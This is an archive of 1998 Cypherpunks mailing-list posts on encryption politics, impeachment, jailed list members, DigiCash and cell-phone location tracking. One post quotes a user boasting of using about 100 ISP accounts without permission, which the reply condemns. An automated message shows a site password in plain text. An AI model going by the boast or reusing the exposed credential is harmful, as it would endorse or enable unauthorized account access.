Message-ID: <9809170556.AA07174@ma-kaka.massey.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain




I will, in the next few days, see if there is a way I can get money
this fast. I have a margin of credit at LL, so I could use that with
my investements as collateral and reimbursement.

I need to get myself sane and physically well, and this is not totally
trivial.

My boss, besides, is in his usual pre-bitching mood. So I need to
watch out.

nicolas




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walter Burton <wburton@pipestream.com>
Date: Thu, 17 Sep 1998 17:08:13 +0800
To: Anonymous <cypherpunks@toad.com
Subject: RE: Encryption and Terrorists
Message-ID: <013D438ED22ED2119F630060082F763C04DDD7@kenny.pipestream.com>
MIME-Version: 1.0
Content-Type: text/plain



I hope you don't feel like this (cliche) message has actually
accomplished anything.  Posting this message to cypherpunks is preaching
to the choir.  

Get out there and actually _DO_ something about it.


\\/alter

> -----Original Message-----
> From: Anonymous [mailto:nobody@nowhere.to]
> Sent: Thursday, September 17, 1998 4:15 PM
> To: cypherpunks@toad.com
> Subject: Encryption and Terrorists
> 
> 
> Wake up America! Encryption doesn't kill people!  Terrorists do.
> Would you give the keys to your house to the government? Just in
> case they have to break in? NO!  How about your ATM PIN #, 
> just in case
> you don't pay your taxes? NO! So don't give out your keys that you use
> for
> encrpytion and don't let the government have a way to get them either!
> 
> Just say NO to the UNCONSTITUTIONAL idea of Limited Privacy! 
> After all,
> we are not COMMUNISTS.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 17 Sep 1998 17:38:34 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Democracy... (fwd)
Message-ID: <199809172303.SAA16982@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Democracy... (fwd)
> Date: Thu, 17 Sep 1998 14:43:32 -0700

> > There's your first problem, your argument won't stand in the 
> 
> No, there is a strict difference between the defining a word and
> defining a philosophy coined after that word.

The *point* is neither word definition or philosophy, the point *is* the
5,000+ years of human history that define the issues related to the
individual, political expression, and religous freedom. The meaning is in
the context (not the medium - respects to Marshall).

> > Religion and by extension faith are not
> > constrained by reason or logic.
> 
> How do you account for this contradiction. I hold a personal philosophy
> that is strictly and absolutely constrained by reason and logic.

In your mind. You make the same mistake bejillions before you have made and
continue to make. Just because you are satisfied with it is no justification
to foist it off on me or to expect it will satisfy me. As Santyana said,

Those who don't understand history are doomed to repeate it.

This is why it is important to not fall into your 'relativistic' abolition
of history.

> Do you believe in THE FORCE, as described by the great prophet George
> Lucas?

You really should give up drugs.

> If you say "Yes," am I to claim that is your *religious* belief, not
> subject to reason, logic or empirical evidence?

Absolutely, well except for one very important point. It isn't your claiming
it's my religion that makes it so, it's my claiming it that makes it so.
What *you* claim is my religion is irrelevant and immaterial.

If we follow your plan we would outlaw anything that couldn't be reduced to
an equation in some predicate calculus. There is more in heaven and earth
than in your philosophy Horatio.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Sep 1998 17:55:10 +0800
To: cypherpunks@toad.com
Subject: Jim Bell and CJ Upbeat
Message-ID: <199809172250.SAA24991@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded message:

Subject: Update on Jim
Date: Thu, 17 Sep 1998

I spoke with Jim last night. He had been "in the hole", 
as he calls it, for almost 7 days. This is when he is 
placed in a cell by himself on a different floor and is not
allowed out of it (they bring his food to him, instead of 
his going to the cafeteria, and can't go out to the social 
area - to play pool, for instance). He said it was because 
he had remarked to a warden that she had the ugliest voice 
in the whole world, after she repeatedly told the inmates 
to clean up their rooms even though they had complied
repeatedly to her demands. (I asked him if he had spent 
the time reading Atlas Shrugged, and he said he'd done that 
a bit. I don't think he's much interested in railroads, 
taking quite some time to get through it, although he told 
me he's a fast reader).

Anyway last night his things had been packed and he expected 
to be shipped to Oklahoma City this morning.  He will be 
there anywhere from half a day to two days and then be sent
on to Springfield, MO for the mental eval. Perhaps he will 
meet up with Toto there.

[End forward]

JYA:

If it's not been mentioned here CJ was in transit to 
Springfield over the weekend, being held for unknown
reasons in OKC from where he called a fan who passed
on the news. He's in good spirits.

And Jim is reported to be in good spirits. So it's all
worked out, their notoriety a tonic for tired blood, try
it, depressives.

Both are sassing the jailers, getting railroaded to 
OKC and Springfield for a bit of mind-bending and 
-straightening. Are they fit to stand trial, oh yeah, 
do it, the snakes of Medusa.

No one knows what the OKC stopover for Jim or CJ is about,
maybe to introduce them to each other (Jim claims to not 
know CJ -- smart), maybe to kick dirt on the homeplate of
Murrah Memorial, get image-counseled by Anita Hill.

Jim and CJ in Springfield at the same time, getting heavy
mentaled, wordsmith assassination duelers. Now that's a 
Teen Spirit I'd like to smell.

Remember, Music Capital Branson is just down the road from 
Springfield if cpunks want to gather to banjo code duel.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.hdc.net>
Date: Thu, 17 Sep 1998 19:57:29 +0800
To: jvb@ssds.com>
Subject: Re: Cyberpunks Signal-to-Noise Ratio
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846BC@mossbay.chaffeyhomes.com>
Message-ID: <3601CBEA.2407@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



Think of it as dietary fiber for the mind.


Matthew James Gering wrote:
> 
> What! I can't hear you!
> 
> You could always filter *aol*, *anon* and *sixdegrees*.
> 
> Or shout louder (i.e. contribute signal).
> 
>         Matt
> 
> > -----Original Message-----
> > From: Jim Burnes [mailto:jvb@ssds.com]
> >
> > Far be it from me to complain about the content-free
> > nature of others postings, but has anyone else noticed
> > that the signal on cypherpunks is being lost in the noise?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 17 Sep 1998 19:48:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: your mail (fwd)
Message-ID: <199809180114.UAA00306@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 17 Sep 1998 17:16:16 -0700
> From: Greg Broiles <gbroiles@netbox.com>
> Subject: Re: your mail

> At 05:28 PM 9/17/98 -0400, mgraffam@mhv.net wrote:
> 
> >Damn.. are cypherpunks the only people in the universe smart enough to u=
> se
> >PGP?!?
> 
> And a lot of good it's done the two who've been busted so far .. doesn't
> look like encryption is a serious obstacle to legitimate law enforcement =
> to
> me.

Mitnick certainly took advantage of it.



    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Thu, 17 Sep 1998 20:09:36 +0800
To: AIMSX@aol.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <491b5a5b.36017891@aol.com>
Message-ID: <3.0.2.32.19980917202904.007cf100@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



If you are using the accounts of others without permission then you 
are a thief and you don't come up to the standards of the least 
intelligent user at AOL or anywhere else for that matter. You will 
eventually be caught and hopefully be put away somewhere dark where 
the guards will not care how loud you scream.

Of course you will think this is an empty threat but it is not a 
threat at all. It is a prediction. You are to young and stupid to 
cover your tracks well enough to not be caught.

If you are just boasting then grow up!

Edwin

At 05:01 PM 9/17/98 EDT, you wrote:
>Hmm, well, you were wrong about many things.
>The ISP runs RH5.1
>
>I don't use the passwd file for anything, as it is shadowed.
>
>I don't work there.
>
>I use 100 accounts because it is so easy to get all the new users, 
and the
>changed passwords with the way they are set up, so why stop at one, 
and if
>that one is disabled, I would like something to fall back on.  
>
>You just don't understand anything about why I do what I do.  If you 
were
>illegally using an account, would you want to ONLY have 1?  Why 
wouldn't you
>want to know you had something to fall back on if that one is 
disabled?
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNgGpT0mNf6b56PAtEQI9JgCgsxStWBToflPThdDxKtC5FbKSQW0AoL1q
+lQtbTDzSczsuydtLxHf5xTg
=7oZw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 17 Sep 1998 20:16:01 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Contacting Congress (fwd) [somebody subscribed me?]
Message-ID: <199809180142.UAA00487@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From APFN@netbox.com Thu Sep 17 19:52:20 1998
Message-ID: <36019E31.D13F11E6@netbox.com>
Date: Thu, 17 Sep 1998 16:41:37 -0700
From: American Patriot Friends Network <APFN@netbox.com>
Reply-To: APFN@netbox.com
Organization: American Patriot Friends Network
X-Mailer: Mozilla 4.05 [en] (Win95; I)
MIME-Version: 1.0
To: "\"apfn@onelist.com\"" <apfn@onelist.com>
Subject: Contacting Congress
Content-Type: multipart/mixed; boundary="------------835B6AC49DD57848B52A976B"

This is a multi-part message in MIME format.
--------------835B6AC49DD57848B52A976B
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

+++ CONGRESS +++ U.S. CONGRESS - CALL 1-800-504-0031 OR 202-224-3121
                                      1-800-343-3222
>The new number is: 1-800-361-5222 (90001). When you call the number,
> follow the prompts. When asked for your 5 letter zip code, enter the
> number 90001. You will be connected to the main capitol switchboard.
> Just ask for the congressman or the senator you wish to speak to. If you
> enter your home zip code, you will be connected directly to your
> Congress "CRITTER". (Congressman or Senator)Posted:08/11/98

Contact Congress via the net - Elected Net:
http://www.hoboes.com/html/Politics/electednet/

Netline To Congress - Question of the Day
http://www.netline-to-congress.com/

The Best Congress Money Can Buy
http://mojones.com/COINOP_CONGRESS/data_viewer/data_viewer.html

SENATE:
http://www.senate.gov
SENATE EMAIL ADDRESS:
http://www.senate.gov/senator/membmail.html
http://www.senate.gov/senator/state.html
Senate Judiciary Committee members with contact information:
http://www.senate.gov/committee/judiciary.html
Senate - send email:
http://www.freecongress.org/jsmp/ContactSenators.htm
*** Letter to Senators:
http://members.foothills.net/ricefile/index.html



HOUSE OF REPRESENTATIVES - 
http://www.house.gov
House Of Representatives (EMAIL)
http://www.house.gov/writerep/
House Judiciary Committee members with contact information:
http://www.house.gov/judiciary/mem105.htm
HOUSE AS THE SPEAKER
http://speakernews.house.gov/asknewt/
QUICK SEARCH TEXT OF BILLS 105th CONGRESS:
http://thomas.loc.gov/home/thomas.html?66,9
HOUSE - DOWNLOADING BILL TEXT
http://thomas.loc.gov/home/billdwnloadhelp.html
CONTRACTING CONGRESS
http://www.visi.com/juan/congress/



Here's a timely jewel.  James Traficant's (D-Ohio) one-minute speech
before House on September 15th.

James Traficant (D-Ohio) Home Page
http://www.house.gov/traficant/

E-mail: telljim@mail.house.gov  (Rep. Jim Traficant D-OH)


AN AMERICA WITH TWO LEGAL STANDARDS IS AN AMERICA WITH NO LEGAL
STANDARDS
              September 15, 1998

Mr. Speaker, if Joe Q. Citizen lied in a civil trial, he would be sued
for every penny. If Joe Q. Citizen lied to a Grand Jury, he would go to
jail. Lying is perjury. Perjury is a crime.

Now, having said that, what is going on here, Mr. Speaker? Does America
now have two legal standards, one for you, one for  me; one for he, one
for she; one for generals, one for soldiers; one for Presidents, one for
residents?

Let us tell it like it is. Joe Q. Citizen cannot apologize, Joe Q.
Citizen is not censured, Joe Q. Citizen is prosecuted. And let me warn
Congress: An America with two legal standards is an America with no
legal standards.

Mr. Speaker, I yield back the balance of the lives of all of the
soldiers that gave their lives fighting to preserve our freedom.

Media & Patriot Web Pages: (Bookmark)
http://home.rica.net/CaptainNemo/pers/patsites.htm
--------------835B6AC49DD57848B52A976B
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Received: (from apfn@localhost)
 by netbox.com (8.8.8/8.8.7) id JAA02055
 for pamrobin@caliente.igate.com; Thu, 17 Sep 1998 09:37:44 -0700 (PDT)
 (envelope-from apfn)
Received: from gull.prod.itd.earthlink.net (gull.prod.itd.earthlink.net [207.217.120.85])
 by netbox.com (8.8.8/8.8.7) with ESMTP id JAA02050
 for <APFN@netbox.com>; Thu, 17 Sep 1998 09:37:44 -0700 (PDT)
 (envelope-from idzrus@earthlink.net)
Received: from idzrus.earthlink.net (1Cust129.tnt7.krk1.da.uu.net [208.254.8.129])
 by gull.prod.itd.earthlink.net (8.8.7/8.8.5) with SMTP id JAA18157;
 Thu, 17 Sep 1998 09:35:34 -0700 (PDT)
Message-Id: <3.0.5.32.19980917093214.0356e100@mail.earthlink.net>
X-Sender: idzrus@mail.earthlink.net
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Thu, 17 Sep 1998 09:32:14 -0700
To: idzrus@earthlink.net
From: "W.G.E.N." <idzrus@earthlink.net>
Subject: Contacting Congress via e-mail
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Real-To:  "W.G.E.N." <idzrus@earthlink.net>

>From: gardener@southtech.net
>X-Sender: gardener@southtech.net
>X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
>Date: Thu, 17 Sep 1998 08:34:34 -0400
>To: (Recipient list suppressed)
>Subject: Contacting Congress via e-mail
>
>X-Sender: tbark@nwark.com
>X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1 
>Date: Wed, 16 Sep 1998 22:14:25 -0500
>To: "1a-TBA Members & Friends"  <tbark@nwark.com>
>From: Take Back Arkansas <tbark@nwark.com>
>Subject: Contacting Congress via e-mail
>
>MAKE YOUR VOICES HEARD, PLEASE!  HERE'S HOW.  md
>
>Date: Thu, 10 Sep 1998 10:59:19 -0700
>From: David Dorman
>Organization: University of Idaho
>Subject: Contacting Congress via e-mail
>
>In searching for Congressional e-mail addresses recently, I found the
>below listed web site.  For those of you who have tried to contact many
>members of Congress at once you know how time consuming the process can
>become.
>
>ElectedNet! will allow you to search for a single member by name, state,
>just one party, etc. or you can e-mail all members of Congress at once.
>It provides an effective way to quickly get your message out and uses
>your e-mail program not some "fill in the blanks" type interface.  Using
>this method you will be able to use your spell checker and retain a copy
>of the messages sent for future reference.
>
>In order to improve the impact of your message you should format your
>e-mail like a standard mail letter to congress (minus the TO: section)
>and INCLUDE your return mailing address.  Most members of Congress will
>not reply via e-mail but by U.S. Postal Service, so your return address
>is critical.  This is probably to prevent someone from changing an
>e-mail reply and forwarding without their approval.
>
>Even if you send a letter (e-mail) to a Congressional member who is not
>in your voting district, they will usually respond and track the number
>of letters for or against an issue.  With this web site it is easy to
>just "click" on another name to be included in your letter to Congress
>and the more letters some staff person has to send out the greater the
>impact your message will have during the weekly Congressional office
>staff meetings.
>
>
>http://www.hoboes.com/html/Politics/electednet/
>
>
>
>
>
>Mary Denham, State Coordinator    Take Back Arkansas, Inc.   
>2167 N.  Porter Rd.  Fayetteville,  AR  72704   
>Fax  501/521-1724   Pho  501/521-1933  
>TBA website    http://www.nwark.com/~tbark
>
>
>
>
>



--------------835B6AC49DD57848B52A976B--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 17 Sep 1998 22:57:04 +0800
To: cypherpunks@cyberpass.net
Subject: Mark Twain/Mercantile dumps Digicash
Message-ID: <Pine.BSF.4.02.9809172051050.8485-100000@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain




According to
<http://www.thestandard.com/articles/display/0,1449,1721,00.html?home.mf>,
Mark Twain Bank/Mercantile Bank will no longer support DigiCash. They are
no longer listed as an issuer of ecash on Digicash' website. Neither
organization seems to have information available via the web about the
decision to terminate the service.

--
Greg Broiles
gbroiles@netbox.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<kdbf50c4@auto.sixdegrees.com>
Date: Thu, 17 Sep 1998 20:34:36 +0800
To: "Joe Cypherpunk"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809180128.SAA10967@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Joe Cypherpunk
sixdegrees password: fazefour

Congratulations Joe. You're well on your way to 
becoming a full sixdegrees(tm) member. Here is your member 
password: fazefour. Use it to log-in on the home page 
at the sixdegrees Web site, http://www.sixdegrees.com. 
We'll ask you for a little more information to complete your 
registration, and then you'll be ready to start networking. 

It's important that you return to the site and log-in. Your 
membership will not be complete until you do so.

Once you've successfully logged in with your password, just go 
to Personal Profile and you'll be able to choose your own 
password.

Thanks for becoming part of sixdegrees. We're looking forward 
to seeing you at the site. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you believe you received this e-mail in error, and it was not your 
intention to become a sixdegrees member, or if you have any problems, 
questions or requests send an e-mail to issues@sixdegrees.com
and someone will get back to you as soon as possible.
====================================================================


E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 17 Sep 1998 21:38:39 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: your mail (fwd)
Message-ID: <199809180305.WAA01592@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 18 Sep 1998 04:31:40 +0200 (CEST)
> From: Lucky Green <shamrock@cypherpunks.to>
> Subject: Re: your mail (fwd)

> Mitnick is in jail. Crypto or no crypto.

True, but unlike these other guys they haven't been able to de-crypt the
data and use it against him, and they have denied him access to retrieve
files that supposedly prove his innocence, definitely making the big boys
look more than a tad oppressive. Add onto this the physical abuse that is
supposed to have occurred and it becomes to be seen as an issue irrespective
of his crimes.

I would say that in Mitnick's case the use of crypto has worked to his
long-term advantage.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian W. Buchanan" <brian@smarter.than.nu>
Date: Fri, 18 Sep 1998 00:16:25 +0800
To: Kevin Elliott <k-elliott@wiu.edu>
Subject: Re: Democracy...
In-Reply-To: <v04011704b2278dc4eaa9@[143.43.245.6]>
Message-ID: <Pine.BSF.4.02A.9809172217010.302-100000@smarter.than.nu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Sep 1998, Kevin Elliott wrote:


<snip>

> completely irrelevant to the question at had.  A parking ticket is
> suffiecent to qualify as an impeachable offense under the constitution
> ("high crimes and MISDEMEANORS) but again that isn't relevant.  For the

Incorrect.  A parking ticket, like a speeding ticket or other minor
traffic violations is classified as an "infraction", not a misdemeanor.
Apparently, even the govts. recognizes that there are so many laws on the
books now that one can't possibly hope to avoid breaking them.

-- 
Brian Buchanan                                      brian@smarter.than.nu

Never believe that you know the whole story.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Thu, 17 Sep 1998 21:29:37 +0800
To: Matthew James Gering <mgering@ecosystems.net>
Subject: Re: Mobile phone tracking, pagers, etc
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846AF@mossbay.chaffeyhomes.com>
Message-ID: <19980917222329.A1364@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Sep 17, 1998 at 11:56:02AM -0700, Matthew James Gering wrote:
> 
> Regarding the tracking of mobile phones, are all current types of phones
> susceptible?
> 
> There was a recent post here regarding tracking of GSM phones.
> TDMA/CDMA, analog/digital, PCS-band, etc, are they all equally capable
> of being tracked?

	All the wireless standards I am aware of allow for registration
and polling phones to find out if they are on and available without
ringing them. This provides silent location information to the nearest
cell of a phone merely turned on, location  which may be hundreds of
feet in tightly congested urban areas and tens of square miles in
suburban and less populated areas.   Some system operators apparently
use this feature with all active phones to relieve congestion on paging
channels, while others do not actively track phones not being used
except in certain situations or parts of the network.   Of course
location to a cell is always available during a call...

	The FCC has mandated that this cell-granularity location
information be made available to E-911 centers on emergency calls, and
there may be some situations in which it is currently made available to
domestic law enforcement under other circumstances, though CALEA
restricts such availability without warrents.  Whether and under what
circumstances law enforcement can request a poll be transmitted
(re-registration) to locate a silent but powered phone is less clear.  
It would seem that CALEA forbids this, but what in fact is the practice
by such agencies as the FBI working quietly with cell carriers in places
such as NYC is less clear.

	In the future FCC rules will require that all E-911 calling
wireless phones be located to 125 meters 67% of the time.  There are
proposals to do this with differential time of arrival (DTOA)
or other direction finding techniques (apparently a hard problem
in cities with lots of multipath propagation due to reflections)
that work passively on some or all cell calls and registrations
(thus allowing tracking of everybody), or by cooperation with the
cellphone handset that could be only turned on when the user wished
to be located (an E-911 emergency) and disabled otherwise.   One
version of this would use GPS rather than ranging or other techniques
to determine position relative to the cell sites.    Of course all
the user disaablable  techniques such as GPS and DTOA done in the handset
firmware only will work with future cell firmware and hardware
and not legacy handsets, and because of this may not be acceptable
to the FCC.

	There are some distinctions between CDMA, GSM, analog and TDMA
(non GSM), in respects to exactly how easy it is to implement precision
location meeting the FCC spec passively and on all calls at all times.
Apparently CDMA with its very tight power control to minimize the near-far
problem makes it fairly awkward to reliably triangulate position from
multiple sites since the mobile may be only detectable at one site
at any time...  What this means in practice is that some wireless
technologies are more likely to require some definate active firmware
intervention to do precision location, whilst others may allow it
with no special intervention.   If the FCC allows this intervention
to be enabled by a user, this may provide some opportunity for
location privacy.


> 
> However pagers are not, correct? They just broadcast an entire area to
> page instead of the pager keeping the network informed of their
> location.

	The one way pagers work this way.  The guaranteed delivery two
way pagers do support registration and will know the location of
the pager after a page has been sent to it and any time the system
wants to determine it.   This location will be quite coarse with current
two way (reFlex) pagers with cell sites some distance apart, but 
DF techniques are quite possible and could be implemented by law
enforcement or spooks or other interested groups.  Unlike wireless phones
there is no current FCC requirement for positioning information distribution
or precision positioning infrastructure, so two way pagers aren't
likeyly to be routinely located accurately any time soon.

	Of course most modern wireless phones support paging message
delivery, so more and more people will be using wireless phones with
the FCC mandated tracking accuracy for paging...
> 
> One thing I have long wondered: Why don't they make phones that
> "wake-up" by a paging signal and then accept the call? It might increase
> the connect time significantly, but it would also increase the potential
> stand-by time indefinitely, and the location of the user is only exposed
> when calls are in progress, not while the phone is on stand-by.
> 
	Wireless phones do currently work this way.  They listen to the
forward control channel for a paging message that says they have got a
call coming in and only then do they transmit.  The amount of power used
in transmitting would quickly use up the battery if they continuously
broadcast.  The problem with cellphone location is that they can also be
paged with a registration request that does not cause them to ring
or show any evidence of transmitting, but sends back a brief message
burst (not using much battery).   This can be made to happen every
so often, or only when polled.


> Are there any paging services (particularly alpha paging) that work on a
> global scale? You would think daily pager rental service (esp. at
> airports) would be popular. You could have an email address, even a
> static phone number, that could re-route messages to any pager that you
> happen to have at the time (PSTN-IP-PSTN, or even easier if the pager
> service gives SMTP addresses, which most do these days).
> 
	There are nationwide pager services that broadcast your pages
over very wide areas or depend on registration to locate you down to
a smaller area.  But yes, you can get paged anywhere in the US and
several other countries.  And the new LEO satellite technology will
allow paging over whole continents or potentially anywhere in the world.


> Similarly a PSTN-IP-PSTN interface for voice could give you a static
> phone number that you could dynamically forward anywhere untraceably.

	The LEAs don't like this concept, and one of the provisions of
the CALEA wiretap stuff is providing tracing of calls forwarded so you can't
do this....


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 18 Sep 1998 00:24:17 +0800
To: cypherpunks@cyberpass.net
Subject: RF networks, spread spectrum
Message-ID: <Pine.BSF.4.02.9809172227490.23629-100000@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain




Cpunks interested in radio networking and spread spectrum apps might find
the following links useful - 

<http://www.tapr.org/tapr/html/fhsspaper.97.html> describes the design of
a 900 mhz spread spectrum 128kb/s TCP/IP radio network with 10baseT
input/outputs;

<http://www.tapr.org/ss/qexss.html> provides an overview of spread
spectrum projects/regulations/applications

<http://www.tapr.org/ss/index.html> has links to more spread spectrum
stuff. 

--
Greg Broiles
gbroiles@netbox.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Fri, 18 Sep 1998 00:23:53 +0800
To: nnburk <nnburk@cobain.HDC.NET>
Subject: Re: Cyberpunks Signal-to-Noise Ratio
In-Reply-To: <3601CBEA.2407@yankton.com>
Message-ID: <Pine.LNX.3.96.980917232629.438C-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thu, 17 Sep 1998, nnburk wrote:

> Think of it as dietary fiber for the mind.
> 
> 
Just to show how far down the SNR has gone I have
committed the ultimate atrocity and typo'd Cypherpunks
as Cyberpunks.

Eeeek.

Must have something to do with re-reading Neuromancer
last week.  The unconscious does strange things.

regrets,

jim


-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
Charset: noconv

iQA/AwUBNgHvnOlhVGT5JbsfEQJrRQCfcJ311hK6xZYD4YnzA94nPw0UzVYAoMyN
rM1/eth1yrPAqKfXfXoYLTQw
=tCRD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Elliott <k-elliott@wiu.edu>
Date: Thu, 17 Sep 1998 23:49:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Democracy...
In-Reply-To: <19980916072612.3520.qmail@hotmail.com>
Message-ID: <v04011704b2278dc4eaa9@[143.43.245.6]>
MIME-Version: 1.0
Content-Type: text/plain



>I agree with you completely when you state that religion, ethics, and
>law are distinct and different things.  Unfortunately in the United
>States they have a strong tendency to become intertwined.  The law as it
>stands is that impeachment is only to be used in cases of high crimes
>and misdemeanors.  Now I have not read the entire Starr report nor do I
>have a sophisticated background in law nevertheless nothing Bill has
>done seems to qualify as worthy of impeachment under the law.  However,
>the sexual acts and behaviour exhibited by him is deeply repugnant to
>many on ethical grounds and particularly repugnant to Christians
>specifically.  I do not have any problem at all with those who are
>disgusted by the presidents behaviour on ethical or religious grounds, I
>personally find it repulsive.  I do however feel, as I believe you are
>saying also,  that the law is law.  It should be executed in a fair and
>just manner and according to the letter ( which may or may not lead to
>impeachment ).  The previous poster to which I replied seemed to be very
>clearly stating that his personal religious code of ethics took
>precedence over american legal codes,  a viewpoint which I cannot agree
>with.  All debate on the precice origin and validity of 'seperation of
>church and state' aside I cannot recall any part of the constitution
>which invokes divine justice.  The impeachment issue is not one of
>ethics or religion, simply law and law alone.
>
>Vivek Vaidya

I a word, bullshit.  The constitution the way the constitution was phrased
makes it very clear- YOU DO NOT HAVE TO COMMIT A CRIME TO BE GUILTY OF
IMPEACHABLE OFFENSES!!! Many people have been impeached in Americas history
and most were not guilty of a crime, ie their offenses were not legal
crimes or they were never prosecuted for the crime they were impeached and
tried for.  Fact- the president has commited perjury.  That is undeniable,
Starr has presented his evidence very clearly and I don't think that needs
to be rehashed.  Are his actions sufficient to yield a criminal conviction
in the "real world"?  In a general sense yes but in a broader sense that is
completely irrelevant to the question at had.  A parking ticket is
suffiecent to qualify as an impeachable offense under the constitution
("high crimes and MISDEMEANORS) but again that isn't relevant.  For the
sake of argument I will through out all criminal conduct, all perjury
issues, obstruction of justice, possible sexual assault, everything.  What
we are left with is a president who engaged in gross sexual misconduct with
a women under his employment.  That is ethical misconduct of the most
aggregious kind.  It undermines authority, disturbs professional atmosphere
necessary for a smoothly functioning organization.  In any corporation in
America it would, by custom and, in some jurisdictions, law, be grounds for
immediate dismissal.  Impeachment is exactly that.  It imposes no
punishments, no jail time, no fines, it simply removes an official from the
position he has failed to faithfully execute.



___________________________________________________________________________
"DOS/WIN based computers manufactured by companies such as IBM, Compaq,
Tandy, and millions of others, are by far the most popular, with about 70
million machines in use worldwide. Macintosh fans, on the other hand, note
that cockroaches are far more numerous than humans, and that numbers alone
do not denote a higher life form." - New York Times

-Kevin "The Cubbie" Elliott <mailto:k-elliott@wiu.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zR <q1w2e3@pacific.net.sg>
Date: Thu, 17 Sep 1998 10:52:03 +0800
To: cypherpunks@toad.com
Subject: remove
Message-ID: <3602004C.D6D@pacific.net.sg>
MIME-Version: 1.0
Content-Type: text/plain



remove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Sep 1998 17:26:16 +0800
To: cypherpunks@toad.com
Subject: No Subject
